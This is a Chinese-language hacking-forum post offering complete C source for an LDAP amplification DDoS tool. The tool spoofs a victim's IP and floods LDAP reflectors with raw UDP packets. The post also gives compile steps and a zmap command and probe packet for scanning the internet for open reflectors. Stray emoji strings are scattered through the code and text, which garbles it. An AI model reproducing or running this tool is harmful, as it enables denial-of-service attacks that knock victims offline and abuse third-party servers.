数星星的孩子,是在和夜晚的星空交谈,而不是为了得到一个数字。 收藏本站
登陆 / 注册 搜索

阅读:1423   回复: 1

ldap放大DDOS

[复制链接]
黑客小王 「龙战于野」 2025-2-23 01:05 来自手机 |显示全部楼层

我是黑客阿尔法

ldap放大汉化源码
安装环境指令:
乌班图/Debian系统:
apt install gcc -y
centos系统:
🤛⛄🍭‼🪶‏yum install gcc -y
编译指令:
gcc ldap.c -o ldap -pthread -std=gnu99
最后输入
./ldap

✍🏫🍒📳🐟‏

查看使用方法
注意:本脚本完全开源免费,请勿使用任何已编译版本,使用本脚本必须拥有root权限,否则无法运行该脚本
如何扫描列表呢?请输入一下指令:
组成探针:
echo -ne '30\x84\x00\x00\x00\x2D\x02\x01\x01\x63\x84\x00\x00\x00\x24\x04\x00\x0A\x01\x00\x0A\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0B\x6F\x62\x6A\x65\x63\x74\x63\x6C\x61\x73\x73\x30\x84\x00\x00\x00\x00\x00\x0A' > ldap.pkt👮‍♂️‏🧥📀😷🤟
扫描指令:
zmap -p 389 --probe-module=udp --probe-args="file:ldap.pkt" --output-file=ldap.txt



👌🎠🔪🅰🐝‎
#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
✊⛵🍊🈳🐶‎#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
🖕🌡🍽♂🐡‎#include <arpa/inet.h>
#include <strings.h>
#define MAX_PACKET_SIZE 8192
#define PHI 0x9e3779b9
static uint32_t Q[4096], c = 362436;

👨‍🎨‎🩰✏😶✍


struct list
{
    struct sockaddr_in data;
    struct list *next;
    struct list *prev;🧓‍🩲📞😃🖐
};
struct list *head;
volatile int tehport;
volatile int limiter;
volatile unsigned int pps;
🖕🌦🍒🅰🐒‏volatile unsigned int sleeptime = 100;
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
void init_rand(uint32_t x)
{
    int i;🧑‍🎤‏🎩🔋😭👊
    Q[0] = x;
    Q[1] = x + PHI;
    Q[2] = x + PHI + PHI;
    for (i = 3; i < 4096; i++)
    {👩‎🧥📏🙃💅
    Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
    }
}
uint32_t rand_cmwc(void)
{
👏🚤🍍‼🐥‎    uint64_t t, a = 18782LL;
    static uint32_t i = 4095;
    uint32_t x, r = 0xfffffffe;
    i = (i + 1) & 4095;
    t = a * Q[i] + c;👵‍🩳🔑😷🤌
    c = (t >> 32);
    x = t + c;
    if (x < c) {
    x++;
    c++;

👃🌰⚛🐺‏

    }
    return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int nwords)
{

✌🏝🥑ℹ🦟‌

    unsigned long sum = 0;
    for (sum = 0; nwords > 0; nwords--)
    sum += *buf++;
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
✍🛑🥩↔🐞‎    return (unsigned short)(~sum);
}
void setup_ip_header(struct iphdr *iph)
{
    iph->ihl = 5;
👌🍌✡🐮‎    iph->version = 4;
    iph->tos = 0;
    iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 67;
    iph->id = htons(54321);
    iph->frag_off = 0;
🤟🚘🍪💲🐂‎    iph->ttl = MAXTTL;
    iph->protocol = IPPROTO_UDP;
    iph->check = 0;
    iph->saddr = inet_addr("192.168.3.100");
}
👂🚐🍓🆗🦜‍void setup_udp_header(struct udphdr *udph)
{
    udph->source = htons(5678);
    udph->dest = htons(389);
    udph->check = 0;

👏🚗🍚🅾🐤‍

    memcpy((void *)udph + sizeof(struct udphdr), "\x30\x84\x00\x00\x00\x2d\x02\x01\x01\x63\x84\x00\x00\x00\x24\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x84\x00\x00\x00\x00\x00", 67);
    udph->len=htons(sizeof(struct udphdr) + 67);
}
void *flood(void *par1)
{

👩‎💄🧪😔✋


    struct thread_data *td = (struct thread_data *)par1;
    char datagram[MAX_PACKET_SIZE];
    struct iphdr *iph = (struct iphdr *)datagram;
    struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
    struct sockaddr_in sin = td->sin;👦‌🕶🖥😰👍
    struct  list *list_node = td->list_node;
    int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
    if(s < 0){
    printf("无法打开原始套接字,请问是否root?\n");
    exit(-1);👵‏👙✏😄🤛
    }
    init_rand(time(NULL));
    memset(datagram, 0, MAX_PACKET_SIZE);
    setup_ip_header(iph);
    setup_udp_header(udph);

👨‍⚕️‍🥾🩺😒👆


    udph->source = htons(rand() % 65535 - 1026);
    iph->saddr = sin.sin_addr.s_addr;
    iph->daddr = list_node->data.sin_addr.s_addr;
    iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
    int tmp = 1;
🖕🎢🍇🆒🪶‍    const int *val = &tmp;
    if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
    printf("无法设置IP_HDRINCL 请问是否root?\n");
    exit(-1);
    }👩‏🩴🖨😫🦴
    init_rand(time(NULL));
    register unsigned int i;
    i = 0;
    while(1){
        sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));👵‌👜🖥😋✌
        list_node = list_node->next;
        iph->daddr = list_node->data.sin_addr.s_addr;
        iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
        iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
        
👍💈🍒♏🐖‌        pps++;
        if(i >= limiter)
        {
            i = 0;
            usleep(sleeptime);🧑‍🎤‌🛍⚒😂✋
        }
        i++;
    }
}
int main(int argc, char *argv[ ])

👏🛩🍓🆗🦋‍

{
    if(argc < 6){
        printf("无效的参数\n");
        fprintf(stdout, "用法: %s <IP> <端口> <LDAP 列表> <线程> <每秒pps限制 (-1无限制)> <时间>\n", argv[0]);
        exit(-1);

‌👜🔑🤝


    }
    srand(time(NULL));
    int i = 0;
    head = NULL;
    printf("[+] 开始攻击... [+]\n");🧑‍🚀‏👞🔒😄✍
    int max_len = 128;
    char *buffer = (char *) malloc(max_len);
    buffer = memset(buffer, 0x00, max_len);
    int num_threads = atoi(argv[4]);
    int maxpps = atoi(argv[5]);👩‍✈️‌🧢📟😄🦷
    limiter = 0;
    pps = 0;
    int multiplier = 20;
    FILE *list_fd = fopen(argv[3],  "r");
    while (fgets(buffer, max_len, list_fd) != NULL) {

🖐🌦🎂♾🐋‎

        if ((buffer[strlen(buffer) - 1] == '\n') ||
                (buffer[strlen(buffer) - 1] == '\r')) {
            buffer[strlen(buffer) - 1] = 0x00;
            if(head == NULL)
            {👳‌💄🧻😚🙌
                head = (struct list *)malloc(sizeof(struct list));
                memset(&head->data, 0, sizeof(head->data));
                head->data.sin_addr.s_addr=inet_addr(buffer);
                head->next = head;
                head->prev = head;
👏⛵🫖♏🐶‌            } else {
                struct list *new_node = (struct list *)malloc(sizeof(struct list));
                memset(new_node, 0x00, sizeof(struct list));
                new_node->data.sin_addr.s_addr=inet_addr(buffer);
                new_node->prev = head;

👴‌👔🗑😇👍


                new_node->next = head->next;
                head->next = new_node;
            }
            i++;
        } else {
👍⛄🦞©🐅‌            continue;
        }
    }
    struct list *current = head->next;
    pthread_t thread[num_threads];👮‍♂️‍👔📮🤩👎
    struct sockaddr_in sin;
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr(argv[1]);
    struct thread_data td[num_threads];
    for(i = 0;i<num_threads;i++){
💪🚤🍞🔞🐡‍        td[i].thread_id = i;
        td[i].sin= sin;
        td[i].list_node = current;
        pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
    }🧑‍⚕️‍👑🧲😡👊
    for(i = 0;i<(atoi(argv[6])*multiplier);i++)
    {
        usleep((1000/multiplier)*1000);
        if((pps*multiplier) > maxpps)
        {
🤝🧳🍞📶🦖‍            if(1 > limiter)
            {
                sleeptime+=100;
            } else {
                limiter--;🧑‍🎤‏🧥⚔😪✊
            }
        } else {
            limiter++;
            if(sleeptime > 25)
            {
🧠🛑🍏❗🐞‍                sleeptime-=25;
            } else {
                sleeptime = 0;
            }
        }
🙏🦞🈸🦕‎        pps = 0;
    }
    return 0;
}
上一篇
下一篇
帖子热度 1433 ℃

香风嫣然 「初入古黑」 2025-2-23 01:07 |显示全部楼层

这个用户很懒,还没有填写自我介绍呢~

虽然今天什么也没干‍‍,但还是辛苦我了‍。
您需要登录后才可以回帖 登录 | 免费注册  

本版积分规则

快速回复 返回列表